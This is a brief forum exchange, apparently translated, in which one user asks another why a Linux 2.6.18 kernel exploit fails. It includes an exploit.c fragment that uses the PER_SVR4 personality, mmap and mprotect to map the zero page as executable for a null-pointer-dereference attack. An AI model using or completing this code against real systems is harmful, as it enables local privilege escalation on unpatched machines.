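Since you already have a test environment, why not just try it? Or are you deliberately testing me, haha. My understanding is that on a 2.6.18 system, if you can set PER_SVR4, you can map address 0.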
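Haha, sorry about that.
I did test it, but the exploit did not succeed.
Since I thought it should work in theory, I wanted to ask brother W.Z.T.
After setting PER_SVR4, exploit.c calls mprotect to modify the memory region, but that failed: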
if ((personality(0xffffffff)) != PER_SVR4) {
    dbgprint("Not equal to PER_SVR4, \n");
    mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    dbgprint("first mmap, mem = %p, addr = %x\n", mem, (unsigned long)mem);
    if (mem != NULL) {
        /* for old kernels with SELinux that don't allow RWX anonymous mappings
           luckily they don't have NX support either ;) */
        mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
        dbgprint("second mmap, mem = %p\n", mem);
        if (mem != NULL) {
            fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
            return 1;
        }
    }
} else {
    ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
    if (ret == -1) {
        fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
        return 1;
    }
}